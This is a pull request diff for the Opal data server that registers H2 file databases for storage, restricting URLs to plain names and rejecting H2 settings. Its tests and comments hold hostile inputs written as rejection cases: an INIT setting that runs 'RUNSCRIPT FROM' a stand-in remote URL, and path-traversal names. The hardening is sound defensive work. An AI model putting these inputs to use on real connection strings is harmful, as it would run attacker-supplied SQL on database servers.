### PR TITLE
feat(database): register H2 file databases for storage

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -1,8 +1,8 @@
 ##
 ## Makefile for Opal developers
 ##
-version=5.7-SNAPSHOT
-magma_version=5.4-SNAPSHOT
+version=5.8-SNAPSHOT
+magma_version=5.5-SNAPSHOT
 commons_version=5.2-SNAPSHOT
 java_opts="-Xms1G -Xmx4G -XX:+UseG1GC"
 #java_opts="-Xms1G -Xmx4G"

--- a/opal-core-api/src/main/java/org/obiba/opal/core/service/database/InvalidH2DatabaseException.java
+++ b/opal-core-api/src/main/java/org/obiba/opal/core/service/database/InvalidH2DatabaseException.java
@@ -1,0 +1,20 @@
+/*
+ * Copyright (c) 2021 OBiBa. All rights reserved.
+ *
+ * This program and the accompanying materials
+ * are made available under the terms of the GNU Public License v3.0.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+package org.obiba.opal.core.service.database;
+
+public class InvalidH2DatabaseException extends RuntimeException {
+
+  private static final long serialVersionUID = 5361391812021462923L;
+
+  public InvalidH2DatabaseException(String message) {
+    super(message);
+  }
+}

--- a/opal-core-ws/src/main/java/org/obiba/opal/web/system/database/InvalidH2DatabaseExceptionMapper.java
+++ b/opal-core-ws/src/main/java/org/obiba/opal/web/system/database/InvalidH2DatabaseExceptionMapper.java
@@ -1,0 +1,39 @@
+/*
+ * Copyright (c) 2021 OBiBa. All rights reserved.
+ *
+ * This program and the accompanying materials
+ * are made available under the terms of the GNU Public License v3.0.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+package org.obiba.opal.web.system.database;
+
+import jakarta.ws.rs.core.Response;
+import jakarta.ws.rs.ext.Provider;
+
+import org.obiba.opal.core.service.database.InvalidH2DatabaseException;
+import org.obiba.opal.web.magma.ClientErrorDtos;
+import org.obiba.opal.web.provider.ErrorDtoExceptionMapper;
+import org.springframework.stereotype.Component;
+
+import org.obiba.opal.web.model.Ws;
+
+import static jakarta.ws.rs.core.Response.Status.BAD_REQUEST;
+
+@Component
+@Provider
+public class InvalidH2DatabaseExceptionMapper extends ErrorDtoExceptionMapper<InvalidH2DatabaseException> {
+
+  @Override
+  protected Response.Status getStatus() {
+    return BAD_REQUEST;
+  }
+
+  @Override
+  protected Ws.ClientErrorDto getErrorDto(InvalidH2DatabaseException exception) {
+    return ClientErrorDtos.getErrorMessage(getStatus(), "InvalidH2Database", exception);
+  }
+
+}

--- a/opal-core-ws/src/main/java/org/obiba/opal/web/system/database/JdbcDriversResource.java
+++ b/opal-core-ws/src/main/java/org/obiba/opal/web/system/database/JdbcDriversResource.java
@@ -15,6 +15,7 @@ import io.swagger.v3.oas.annotations.responses.ApiResponse;
 import io.swagger.v3.oas.annotations.responses.ApiResponses;
 import io.swagger.v3.oas.annotations.tags.Tag;
 import org.obiba.opal.web.model.Database;
+import org.obiba.opal.web.model.Database.DatabaseDto.Usage;
 import org.springframework.stereotype.Component;
 import org.springframework.transaction.annotation.Transactional;
 
@@ -22,12 +23,16 @@ import jakarta.ws.rs.GET;
 import jakarta.ws.rs.Path;
 import java.util.ArrayList;
 import java.util.Collection;
+import java.util.List;
 
 @Component
 @Transactional
 @Path("/system/databases/jdbc-drivers")
 @Tag(name = "Databases", description = "Operations on databases")
 public class JdbcDriversResource {
+
+  private static final Collection<String> ALL_USAGES = List
+      .of(Usage.IMPORT.name(), Usage.STORAGE.name(), Usage.EXPORT.name());
 
   @GET
   @Operation(
@@ -46,6 +51,7 @@ public class JdbcDriversResource {
         .setJdbcUrlTemplate("jdbc:mysql://{hostname}:{port}/{databaseName}") //
         .setJdbcUrlExample("jdbc:mysql://localhost:3306/opal") //
         .addSupportedSchemas("jdbc") //
+        .addAllSupportedUsages(ALL_USAGES) //
         .build());
     drivers.add(Database.JdbcDriverDto.newBuilder() //
         .setDriverName("MariaDB") //
@@ -53,6 +59,7 @@ public class JdbcDriversResource {
         .setJdbcUrlTemplate("jdbc:mariadb://{hostname}:{port}/{databaseName}") //
         .setJdbcUrlExample("jdbc:mariadb://localhost:3306/opal") //
         .addSupportedSchemas("jdbc") //
+        .addAllSupportedUsages(ALL_USAGES) //
         .build());
     drivers.add(Database.JdbcDriverDto.newBuilder() //
         .setDriverName("PostgreSQL") //
@@ -60,6 +67,7 @@ public class JdbcDriversResource {
         .setJdbcUrlTemplate("jdbc:postgresql://{hostname}:{port}/{databaseName}") //
         .setJdbcUrlExample("jdbc:postgresql://localhost:5432/opal") //
         .addSupportedSchemas("jdbc") //
+        .addAllSupportedUsages(ALL_USAGES) //
         .build());
     drivers.add(Database.JdbcDriverDto.newBuilder() //
         .setDriverName("SQL Server") //
@@ -67,6 +75,17 @@ public class JdbcDriversResource {
         .setJdbcUrlTemplate("jdbc:sqlserver://{hostname}:{port};databaseName={databaseName}") //
         .setJdbcUrlExample("jdbc:sqlserver://localhost:1433;databaseName=opal") //
         .addSupportedSchemas("jdbc") //
+        .addAllSupportedUsages(ALL_USAGES) //
+        .build());
+    // H2 is embedded: the database is registered by name only, its file lives in the Opal H2 folder, and it can only
+    // be used for storage as there is no pre-existing database to import from or export to.
+    drivers.add(Database.JdbcDriverDto.newBuilder() //
+        .setDriverName("H2") //
+        .setDriverClass("org.h2.Driver") //
+        .setJdbcUrlTemplate("jdbc:h2:file:{databaseName}") //
+        .setJdbcUrlExample("jdbc:h2:file:opal") //
+        .addSupportedSchemas("jdbc") //
+        .addSupportedUsages(Usage.STORAGE.name()) //
         .build());
     return drivers;
   }

--- a/opal-core/pom.xml
+++ b/opal-core/pom.xml
@@ -163,6 +163,11 @@
       <scope>test</scope>
     </dependency>
     <dependency>
+      <groupId>com.h2database</groupId>
+      <artifactId>h2</artifactId>
+      <scope>runtime</scope>
+    </dependency>
+    <dependency>
       <groupId>org.mariadb.jdbc</groupId>
       <artifactId>mariadb-java-client</artifactId>
       <scope>runtime</scope>

--- a/opal-core/src/main/java/org/obiba/opal/core/runtime/jdbc/DataSourceFactory.java
+++ b/opal-core/src/main/java/org/obiba/opal/core/runtime/jdbc/DataSourceFactory.java
@@ -47,10 +47,14 @@ public class DataSourceFactory {
 
     String driverClass = sqlSettings.getDriverClass();
     factoryBean.setDriverClass(driverClass);
-    // H2 databases are registered by name only, the file lives in the Opal H2 folder
-    factoryBean.setUrl(H2DatabaseUrls.isH2(driverClass)
-        ? H2DatabaseUrls.expand(sqlSettings.getUrl(), h2Root)
-        : sqlSettings.getUrl());
+    if(H2DatabaseUrls.isH2(driverClass)) {
+      // H2 databases are registered by name only, the file lives in the Opal H2 folder
+      factoryBean.setUrl(H2DatabaseUrls.expand(sqlSettings.getUrl(), h2Root));
+      // the settings are rejected when the database is registered, check them again on the way to the driver
+      H2DatabaseUrls.validateProperties(sqlSettings.getProperties());
+    } else {
+      factoryBean.setUrl(sqlSettings.getUrl());
+    }
     factoryBean.setUsername(sqlSettings.getUsername());
     factoryBean.setPassword(sqlSettings.getPassword());
     factoryBean.setConnectionProperties(sqlSettings.getProperties());

--- a/opal-core/src/main/java/org/obiba/opal/core/runtime/jdbc/DataSourceFactory.java
+++ b/opal-core/src/main/java/org/obiba/opal/core/runtime/jdbc/DataSourceFactory.java
@@ -19,6 +19,7 @@ import org.springframework.context.ApplicationContext;
 import org.springframework.stereotype.Component;
 
 import javax.sql.DataSource;
+import java.io.File;
 
 @Component
 public class DataSourceFactory {
@@ -28,6 +29,9 @@ public class DataSourceFactory {
 
   @Value("${org.obiba.opal.jdbc.maxPoolSize}")
   private Integer maxPoolSize;
+
+  @Value("${OPAL_HOME}/data/h2")
+  private File h2Root;
 
   public DataSourceFactory() {}
 
@@ -41,8 +45,12 @@ public class DataSourceFactory {
       throw new IllegalArgumentException("Cannot create a JDBC DataSource without SqlSettings");
     }
 
-    factoryBean.setDriverClass(sqlSettings.getDriverClass());
-    factoryBean.setUrl(sqlSettings.getUrl());
+    String driverClass = sqlSettings.getDriverClass();
+    factoryBean.setDriverClass(driverClass);
+    // H2 databases are registered by name only, the file lives in the Opal H2 folder
+    factoryBean.setUrl(H2DatabaseUrls.isH2(driverClass)
+        ? H2DatabaseUrls.expand(sqlSettings.getUrl(), h2Root)
+        : sqlSettings.getUrl());
     factoryBean.setUsername(sqlSettings.getUsername());
     factoryBean.setPassword(sqlSettings.getPassword());
     factoryBean.setConnectionProperties(sqlSettings.getProperties());

--- a/opal-core/src/main/java/org/obiba/opal/core/runtime/jdbc/H2DatabaseUrls.java
+++ b/opal-core/src/main/java/org/obiba/opal/core/runtime/jdbc/H2DatabaseUrls.java
@@ -1,0 +1,98 @@
+/*
+ * Copyright (c) 2021 OBiBa. All rights reserved.
+ *
+ * This program and the accompanying materials
+ * are made available under the terms of the GNU Public License v3.0.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+package org.obiba.opal.core.runtime.jdbc;
+
+import com.google.common.base.Strings;
+import jakarta.annotation.Nullable;
+import org.obiba.opal.core.service.database.InvalidH2DatabaseException;
+
+import java.io.File;
+import java.util.regex.Pattern;
+
+/**
+ * H2 databases are embedded: they live in files owned by the Opal server, in a single folder. Users register them by
+ * name only ({@code jdbc:h2:file:<name>}), and that short form is what gets persisted; the name is expanded to an
+ * absolute path in the H2 folder when the connection is opened. Restricting the URL to a plain name is what keeps the
+ * databases inside that folder: a path separator or a parent reference cannot be expressed, so there is nothing to
+ * escape with.
+ */
+public final class H2DatabaseUrls {
+
+  public static final String DRIVER_CLASS = "org.h2.Driver";
+
+  private static final String FILE_PREFIX = "jdbc:h2:file:";
+
+  /**
+   * A single file name, not starting with a dot, with no path separator and no drive or protocol separator.
+   */
+  private static final Pattern NAME_PATTERN = Pattern.compile("[A-Za-z0-9_-][A-Za-z0-9._-]*");
+
+  /**
+   * H2 1.x page store file suffix, unreadable by the H2 2.x driver that Opal ships.
+   */
+  private static final String LEGACY_SUFFIX = ".h2.db";
+
+  private static final String SUFFIX = ".mv.db";
+
+  private H2DatabaseUrls() {
+  }
+
+  public static boolean isH2(@Nullable String driverClass) {
+    return DRIVER_CLASS.equals(driverClass);
+  }
+
+  /**
+   * Extract the database name from a {@code jdbc:h2:file:<name>} URL, rejecting anything that is not a plain name.
+   *
+   * @throws InvalidH2DatabaseException if the URL is not of the expected form
+   */
+  public static String getDatabaseName(@Nullable String url) {
+    if(Strings.isNullOrEmpty(url) || !url.startsWith(FILE_PREFIX)) {
+      throw new InvalidH2DatabaseException("H2 database URL must be of the form " + FILE_PREFIX + "<name>");
+    }
+    String name = stripSettings(url.substring(FILE_PREFIX.length()));
+    if(!NAME_PATTERN.matcher(name).matches()) {
+      throw new InvalidH2DatabaseException(
+          "H2 database name must be a plain file name, made of letters, digits, '.', '_' or '-': '" + name + "'");
+    }
+    return name;
+  }
+
+  /**
+   * Verify that the URL names a database that the H2 driver shipped by Opal can open.
+   *
+   * @throws InvalidH2DatabaseException if the URL is not of the expected form, or names an H2 1.x database
+   */
+  public static void validate(@Nullable String url, File h2Root) {
+    String name = getDatabaseName(url);
+    if(new File(h2Root, name + LEGACY_SUFFIX).exists() && !new File(h2Root, name + SUFFIX).exists()) {
+      throw new InvalidH2DatabaseException(
+          "H2 database '" + name + "' is in the H2 1.x format and must be migrated to H2 2.x");
+    }
+  }
+
+  /**
+   * Turn {@code jdbc:h2:file:<name>} into an absolute URL in the H2 folder, keeping any H2 settings appended to it.
+   * The folder is created if missing, as H2 does not create it.
+   */
+  public static String expand(@Nullable String url, File h2Root) {
+    String name = getDatabaseName(url);
+    if(!h2Root.exists() && !h2Root.mkdirs() && !h2Root.exists()) {
+      throw new InvalidH2DatabaseException("Cannot create the H2 databases folder: " + h2Root.getAbsolutePath());
+    }
+    String settings = url.substring(FILE_PREFIX.length() + name.length());
+    return FILE_PREFIX + new File(h2Root, name).getAbsolutePath() + settings;
+  }
+
+  private static String stripSettings(String spec) {
+    int idx = spec.indexOf(';');
+    return idx < 0 ? spec : spec.substring(0, idx);
+  }
+}

--- a/opal-core/src/main/java/org/obiba/opal/core/runtime/jdbc/H2DatabaseUrls.java
+++ b/opal-core/src/main/java/org/obiba/opal/core/runtime/jdbc/H2DatabaseUrls.java
@@ -22,6 +22,11 @@ import java.util.regex.Pattern;
  * absolute path in the H2 folder when the connection is opened. Restricting the URL to a plain name is what keeps the
  * databases inside that folder: a path separator or a parent reference cannot be expressed, so there is nothing to
  * escape with.
+ * <p>
+ * The name is the whole URL: H2 settings, which a {@code ;} would introduce, are not accepted. They are not a way of
+ * tuning the connection but a second language, in which {@code INIT} alone runs arbitrary SQL — {@code RUNSCRIPT FROM}
+ * a remote URL included — every time the connection is opened. The same setting can be passed as a connection
+ * property, so {@link #validateProperties(String)} rejects it there too.
  */
 public final class H2DatabaseUrls {
 
@@ -30,9 +35,15 @@ public final class H2DatabaseUrls {
   private static final String FILE_PREFIX = "jdbc:h2:file:";
 
   /**
-   * A single file name, not starting with a dot, with no path separator and no drive or protocol separator.
+   * A single file name, not starting with a dot, with no path separator, no drive or protocol separator, and no H2
+   * settings separator.
    */
   private static final Pattern NAME_PATTERN = Pattern.compile("[A-Za-z0-9_-][A-Za-z0-9._-]*");
+
+  /**
+   * H2 setting that runs SQL statements when a connection is opened.
+   */
+  private static final String INIT_SETTING = "INIT";
 
   /**
    * H2 1.x page store file suffix, unreadable by the H2 2.x driver that Opal ships.
@@ -57,10 +68,11 @@ public final class H2DatabaseUrls {
     if(Strings.isNullOrEmpty(url) || !url.startsWith(FILE_PREFIX)) {
       throw new InvalidH2DatabaseException("H2 database URL must be of the form " + FILE_PREFIX + "<name>");
     }
-    String name = stripSettings(url.substring(FILE_PREFIX.length()));
+    String name = url.substring(FILE_PREFIX.length());
     if(!NAME_PATTERN.matcher(name).matches()) {
       throw new InvalidH2DatabaseException(
-          "H2 database name must be a plain file name, made of letters, digits, '.', '_' or '-': '" + name + "'");
+          "H2 database name must be a plain file name, made of letters, digits, '.', '_' or '-', with no H2 setting " +
+              "appended to it: '" + name + "'");
     }
     return name;
   }
@@ -79,20 +91,32 @@ public final class H2DatabaseUrls {
   }
 
   /**
-   * Turn {@code jdbc:h2:file:<name>} into an absolute URL in the H2 folder, keeping any H2 settings appended to it.
-   * The folder is created if missing, as H2 does not create it.
+   * Verify that the connection properties, a {@code ;} separated list of {@code name=value} pairs handed to the driver
+   * as they are, carry no {@code INIT} setting: H2 reads its settings from the properties as well as from the URL.
+   *
+   * @throws InvalidH2DatabaseException if an INIT setting is present
+   */
+  public static void validateProperties(@Nullable String properties) {
+    if(Strings.isNullOrEmpty(properties)) return;
+    for(String property : properties.split(";")) {
+      int idx = property.indexOf('=');
+      String name = (idx < 0 ? property : property.substring(0, idx)).trim();
+      if(INIT_SETTING.equalsIgnoreCase(name)) {
+        throw new InvalidH2DatabaseException(
+            "The H2 INIT setting is not allowed: it runs SQL statements every time the connection is opened");
+      }
+    }
+  }
+
+  /**
+   * Turn {@code jdbc:h2:file:<name>} into an absolute URL in the H2 folder. The folder is created if missing, as H2
+   * does not create it.
    */
   public static String expand(@Nullable String url, File h2Root) {
     String name = getDatabaseName(url);
     if(!h2Root.exists() && !h2Root.mkdirs() && !h2Root.exists()) {
       throw new InvalidH2DatabaseException("Cannot create the H2 databases folder: " + h2Root.getAbsolutePath());
     }
-    String settings = url.substring(FILE_PREFIX.length() + name.length());
-    return FILE_PREFIX + new File(h2Root, name).getAbsolutePath() + settings;
-  }
-
-  private static String stripSettings(String spec) {
-    int idx = spec.indexOf(';');
-    return idx < 0 ? spec : spec.substring(0, idx);
+    return FILE_PREFIX + new File(h2Root, name).getAbsolutePath();
   }
 }

--- a/opal-core/src/main/java/org/obiba/opal/core/service/DefaultDatabaseRegistry.java
+++ b/opal-core/src/main/java/org/obiba/opal/core/service/DefaultDatabaseRegistry.java
@@ -32,10 +32,12 @@ import org.obiba.opal.core.domain.database.MongoDbSettings;
 import org.obiba.opal.core.domain.database.SqlSettings;
 import org.obiba.opal.core.event.DatasourceDeletedEvent;
 import org.obiba.opal.core.runtime.jdbc.DataSourceFactory;
+import org.obiba.opal.core.runtime.jdbc.H2DatabaseUrls;
 import org.obiba.opal.core.service.database.*;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.beans.factory.annotation.Value;
 import org.springframework.jdbc.core.JdbcOperations;
 import org.springframework.jdbc.core.JdbcTemplate;
 import org.springframework.jdbc.datasource.DataSourceTransactionManager;
@@ -47,6 +49,7 @@ import org.springframework.transaction.support.TransactionCallbackWithoutResult;
 import org.springframework.transaction.support.TransactionTemplate;
 
 import javax.sql.DataSource;
+import java.io.File;
 import java.sql.SQLException;
 
 @Component
@@ -69,6 +72,9 @@ public class DefaultDatabaseRegistry implements DatabaseRegistry {
 
   @Autowired
   private TransactionTemplate transactionTemplate;
+
+  @Value("${OPAL_HOME}/data/h2")
+  private File h2Root;
 
   private final LoadingCache<String, DataSource> dataSourceCache = CacheBuilder.newBuilder() //
       .removalListener(new DataSourceRemovalListener()) //
@@ -167,6 +173,7 @@ public class DefaultDatabaseRegistry implements DatabaseRegistry {
 
   private void persist(Database database) {
     validUniqueIdentifiersDatabase(database);
+    validH2Database(database);
 
     if(database.isDefaultStorage()) {
       Database previousDefaultStorageDatabase = getDefaultStorageDatabase();
@@ -181,6 +188,20 @@ public class DefaultDatabaseRegistry implements DatabaseRegistry {
     } else {
       orientDbService.save(database, database);
     }
+  }
+
+  /**
+   * H2 is an embedded database: it is registered by name only, its file lives in the Opal H2 folder, and it can only
+   * be used for storage as there is no pre-existing database to import from or export to.
+   */
+  private void validH2Database(Database database) throws InvalidH2DatabaseException {
+    SqlSettings sqlSettings = database.getSqlSettings();
+    if(sqlSettings == null || !H2DatabaseUrls.isH2(sqlSettings.getDriverClass())) return;
+
+    if(database.getUsage() != Database.Usage.STORAGE) {
+      throw new InvalidH2DatabaseException("H2 databases can only be used for storage");
+    }
+    H2DatabaseUrls.validate(sqlSettings.getUrl(), h2Root);
   }
 
   private void validUniqueIdentifiersDatabase(Database database) throws MultipleIdentifiersDatabaseException {

--- a/opal-core/src/main/java/org/obiba/opal/core/service/DefaultDatabaseRegistry.java
+++ b/opal-core/src/main/java/org/obiba/opal/core/service/DefaultDatabaseRegistry.java
@@ -202,6 +202,7 @@ public class DefaultDatabaseRegistry implements DatabaseRegistry {
       throw new InvalidH2DatabaseException("H2 databases can only be used for storage");
     }
     H2DatabaseUrls.validate(sqlSettings.getUrl(), h2Root);
+    H2DatabaseUrls.validateProperties(sqlSettings.getProperties());
   }
 
   private void validUniqueIdentifiersDatabase(Database database) throws MultipleIdentifiersDatabaseException {

--- a/opal-core/src/main/java/org/obiba/opal/core/service/DefaultDatabaseRegistry.java
+++ b/opal-core/src/main/java/org/obiba/opal/core/service/DefaultDatabaseRegistry.java
@@ -203,6 +203,26 @@ public class DefaultDatabaseRegistry implements DatabaseRegistry {
     }
     H2DatabaseUrls.validate(sqlSettings.getUrl(), h2Root);
     H2DatabaseUrls.validateProperties(sqlSettings.getProperties());
+    validUniqueH2DatabaseFile(database, H2DatabaseUrls.getDatabaseName(sqlSettings.getUrl()));
+  }
+
+  /**
+   * Two registrations naming the same file would be two Opal databases sharing one set of tables. The comparison
+   * ignores case: on a case insensitive file system 'opal' and 'Opal' are the same file, and a name that only holds on
+   * Linux would not survive a move of the H2 folder.
+   */
+  private void validUniqueH2DatabaseFile(Database database, String name) throws InvalidH2DatabaseException {
+    // the identifiers database is an H2 candidate too, so look at every SQL database and not just the listed ones
+    for(Database other : orientDbService
+        .list(Database.class, "select from " + Database.class.getSimpleName() + " where sqlSettings is not null")) {
+      if(other.getName().equals(database.getName())) continue;
+      SqlSettings otherSettings = other.getSqlSettings();
+      if(otherSettings == null || !H2DatabaseUrls.isH2(otherSettings.getDriverClass())) continue;
+      if(name.equalsIgnoreCase(H2DatabaseUrls.getDatabaseName(otherSettings.getUrl()))) {
+        throw new InvalidH2DatabaseException(
+            "H2 database '" + name + "' is already registered as '" + other.getName() + "'");
+      }
+    }
   }
 
   private void validUniqueIdentifiersDatabase(Database database) throws MultipleIdentifiersDatabaseException {

--- a/opal-core/src/test/java/org/obiba/opal/core/runtime/jdbc/H2DatabaseUrlsTest.java
+++ b/opal-core/src/test/java/org/obiba/opal/core/runtime/jdbc/H2DatabaseUrlsTest.java
@@ -1,0 +1,113 @@
+/*
+ * Copyright (c) 2021 OBiBa. All rights reserved.
+ *
+ * This program and the accompanying materials
+ * are made available under the terms of the GNU Public License v3.0.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+package org.obiba.opal.core.runtime.jdbc;
+
+import org.junit.Rule;
+import org.junit.Test;
+import org.junit.rules.TemporaryFolder;
+import org.obiba.opal.core.service.database.InvalidH2DatabaseException;
+
+import java.io.File;
+import java.io.IOException;
+
+import static org.fest.assertions.api.Assertions.assertThat;
+import static org.fest.assertions.api.Assertions.fail;
+
+public class H2DatabaseUrlsTest {
+
+  @Rule
+  public TemporaryFolder temporaryFolder = new TemporaryFolder();
+
+  @Test
+  public void test_is_h2() {
+    assertThat(H2DatabaseUrls.isH2("org.h2.Driver")).isTrue();
+    assertThat(H2DatabaseUrls.isH2("org.postgresql.Driver")).isFalse();
+    assertThat(H2DatabaseUrls.isH2(null)).isFalse();
+  }
+
+  @Test
+  public void test_database_name() {
+    assertThat(H2DatabaseUrls.getDatabaseName("jdbc:h2:file:opal")).isEqualTo("opal");
+    assertThat(H2DatabaseUrls.getDatabaseName("jdbc:h2:file:my-db_1.0")).isEqualTo("my-db_1.0");
+    assertThat(H2DatabaseUrls.getDatabaseName("jdbc:h2:file:opal;DB_CLOSE_DELAY=-1")).isEqualTo("opal");
+  }
+
+  @Test
+  public void test_database_name_must_be_a_plain_name() {
+    // a name is the only thing that can be expressed, so there is no path to escape from
+    assertRejected("jdbc:h2:file:../../etc/opal");
+    assertRejected("jdbc:h2:file:/var/lib/opal");
+    assertRejected("jdbc:h2:file:sub/opal");
+    assertRejected("jdbc:h2:file:sub\\opal");
+    assertRejected("jdbc:h2:file:.opal");
+    assertRejected("jdbc:h2:file:");
+    assertRejected("jdbc:h2:file:;DB_CLOSE_DELAY=-1");
+  }
+
+  @Test
+  public void test_only_file_urls_are_accepted() {
+    assertRejected("jdbc:h2:mem:opal");
+    assertRejected("jdbc:h2:tcp://localhost:9092/opal");
+    assertRejected("jdbc:h2:ssl://localhost:9092/opal");
+    assertRejected("jdbc:h2:zip:~/db.zip!/opal");
+    assertRejected("jdbc:h2:/var/lib/opal");
+    assertRejected("jdbc:postgresql://localhost:5432/opal");
+    assertRejected(null);
+  }
+
+  @Test
+  public void test_expand() throws IOException {
+    File root = temporaryFolder.newFolder("h2");
+    assertThat(H2DatabaseUrls.expand("jdbc:h2:file:opal", root))
+        .isEqualTo("jdbc:h2:file:" + new File(root, "opal").getAbsolutePath());
+    assertThat(H2DatabaseUrls.expand("jdbc:h2:file:opal;DB_CLOSE_DELAY=-1", root))
+        .isEqualTo("jdbc:h2:file:" + new File(root, "opal").getAbsolutePath() + ";DB_CLOSE_DELAY=-1");
+  }
+
+  @Test
+  public void test_expand_creates_the_h2_folder() {
+    File root = new File(temporaryFolder.getRoot(), "data/h2");
+    assertThat(root.exists()).isFalse();
+    H2DatabaseUrls.expand("jdbc:h2:file:opal", root);
+    assertThat(root.isDirectory()).isTrue();
+  }
+
+  @Test
+  public void test_validate_rejects_a_legacy_database() throws IOException {
+    File root = temporaryFolder.newFolder("h2");
+    assertThat(new File(root, "opal.h2.db").createNewFile()).isTrue();
+    assertRejected("jdbc:h2:file:opal", root);
+  }
+
+  @Test
+  public void test_validate_accepts_a_migrated_database() throws IOException {
+    File root = temporaryFolder.newFolder("h2");
+    assertThat(new File(root, "opal.h2.db").createNewFile()).isTrue();
+    assertThat(new File(root, "opal.mv.db").createNewFile()).isTrue();
+    H2DatabaseUrls.validate("jdbc:h2:file:opal", root);
+  }
+
+  @Test
+  public void test_validate_accepts_a_new_database() throws IOException {
+    H2DatabaseUrls.validate("jdbc:h2:file:opal", temporaryFolder.newFolder("h2"));
+  }
+
+  private void assertRejected(String url) {
+    assertRejected(url, temporaryFolder.getRoot());
+  }
+
+  private void assertRejected(String url, File root) {
+    try {
+      H2DatabaseUrls.validate(url, root);
+      fail("Expected an InvalidH2DatabaseException for URL: " + url);
+    } catch(InvalidH2DatabaseException ignored) {
+    }
+  }
+}

--- a/opal-core/src/test/java/org/obiba/opal/core/runtime/jdbc/H2DatabaseUrlsTest.java
+++ b/opal-core/src/test/java/org/obiba/opal/core/runtime/jdbc/H2DatabaseUrlsTest.java
@@ -36,7 +36,6 @@ public class H2DatabaseUrlsTest {
   public void test_database_name() {
     assertThat(H2DatabaseUrls.getDatabaseName("jdbc:h2:file:opal")).isEqualTo("opal");
     assertThat(H2DatabaseUrls.getDatabaseName("jdbc:h2:file:my-db_1.0")).isEqualTo("my-db_1.0");
-    assertThat(H2DatabaseUrls.getDatabaseName("jdbc:h2:file:opal;DB_CLOSE_DELAY=-1")).isEqualTo("opal");
   }
 
   @Test
@@ -48,7 +47,30 @@ public class H2DatabaseUrlsTest {
     assertRejected("jdbc:h2:file:sub\\opal");
     assertRejected("jdbc:h2:file:.opal");
     assertRejected("jdbc:h2:file:");
+  }
+
+  @Test
+  public void test_h2_settings_are_not_accepted() {
+    // a setting is not a tuning knob but a second language: INIT alone runs arbitrary SQL when the connection opens
+    assertRejected("jdbc:h2:file:opal;DB_CLOSE_DELAY=-1");
+    assertRejected("jdbc:h2:file:opal;INIT=RUNSCRIPT FROM 'https://elsewhere.example/payload.sql'");
     assertRejected("jdbc:h2:file:;DB_CLOSE_DELAY=-1");
+  }
+
+  @Test
+  public void test_init_connection_property_is_rejected() {
+    assertPropertiesRejected("INIT=RUNSCRIPT FROM 'https://elsewhere.example/payload.sql'");
+    assertPropertiesRejected("MODE=PostgreSQL;init=CREATE SCHEMA S");
+    assertPropertiesRejected(" Init = SELECT 1 ");
+  }
+
+  @Test
+  public void test_properties_without_an_init_setting_are_accepted() {
+    H2DatabaseUrls.validateProperties(null);
+    H2DatabaseUrls.validateProperties("");
+    H2DatabaseUrls.validateProperties("MODE=PostgreSQL;DB_CLOSE_DELAY=-1");
+    // a value that merely mentions the setting is not one
+    H2DatabaseUrls.validateProperties("MODE=INIT");
   }
 
   @Test
@@ -67,8 +89,6 @@ public class H2DatabaseUrlsTest {
     File root = temporaryFolder.newFolder("h2");
     assertThat(H2DatabaseUrls.expand("jdbc:h2:file:opal", root))
         .isEqualTo("jdbc:h2:file:" + new File(root, "opal").getAbsolutePath());
-    assertThat(H2DatabaseUrls.expand("jdbc:h2:file:opal;DB_CLOSE_DELAY=-1", root))
-        .isEqualTo("jdbc:h2:file:" + new File(root, "opal").getAbsolutePath() + ";DB_CLOSE_DELAY=-1");
   }
 
   @Test
@@ -97,6 +117,14 @@ public class H2DatabaseUrlsTest {
   @Test
   public void test_validate_accepts_a_new_database() throws IOException {
     H2DatabaseUrls.validate("jdbc:h2:file:opal", temporaryFolder.newFolder("h2"));
+  }
+
+  private void assertPropertiesRejected(String properties) {
+    try {
+      H2DatabaseUrls.validateProperties(properties);
+      fail("Expected an InvalidH2DatabaseException for properties: " + properties);
+    } catch(InvalidH2DatabaseException ignored) {
+    }
   }
 
   private void assertRejected(String url) {

--- a/opal-core/src/test/java/org/obiba/opal/core/runtime/jdbc/H2JdbcDatasourceTest.java
+++ b/opal-core/src/test/java/org/obiba/opal/core/runtime/jdbc/H2JdbcDatasourceTest.java
@@ -1,0 +1,108 @@
+/*
+ * Copyright (c) 2021 OBiBa. All rights reserved.
+ *
+ * This program and the accompanying materials
+ * are made available under the terms of the GNU Public License v3.0.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+package org.obiba.opal.core.runtime.jdbc;
+
+import org.apache.commons.dbcp2.BasicDataSource;
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Rule;
+import org.junit.Test;
+import org.junit.rules.TemporaryFolder;
+import org.obiba.magma.MagmaEngine;
+import org.obiba.magma.Value;
+import org.obiba.magma.ValueTable;
+import org.obiba.magma.ValueTableWriter;
+import org.obiba.magma.Variable;
+import org.obiba.magma.VariableEntity;
+import org.obiba.magma.datasource.jdbc.JdbcDatasource;
+import org.obiba.magma.datasource.jdbc.JdbcDatasourceSettings;
+import org.obiba.magma.support.Initialisables;
+import org.obiba.magma.support.VariableEntityBean;
+import org.obiba.magma.type.BinaryType;
+import org.obiba.magma.type.TextType;
+
+import java.io.File;
+
+import static org.fest.assertions.api.Assertions.assertThat;
+
+/**
+ * Magma creates the metadata schema of a JDBC datasource with Liquibase, which resolves the dialect from the
+ * connection. Opal pins both the H2 driver and the Liquibase version, so this checks the combination Opal actually
+ * ships rather than the one Magma was tested with.
+ */
+public class H2JdbcDatasourceTest {
+
+  @Rule
+  public TemporaryFolder temporaryFolder = new TemporaryFolder();
+
+  @Before
+  public void startMagma() {
+    new MagmaEngine();
+  }
+
+  @After
+  public void stopMagma() {
+    MagmaEngine.get().shutdown();
+  }
+
+  @Test
+  public void test_create_table_in_h2_storage() throws Exception {
+    JdbcDatasource datasource = createDatasource();
+
+    ValueTableWriter writer = datasource.createWriter("mytable", "Participant");
+    try(ValueTableWriter.VariableWriter variableWriter = writer.writeVariables()) {
+      variableWriter.writeVariable(Variable.Builder.newVariable("myvar", TextType.get(), "Participant").build());
+    }
+    writer.close();
+
+    ValueTable table = datasource.getValueTable("mytable");
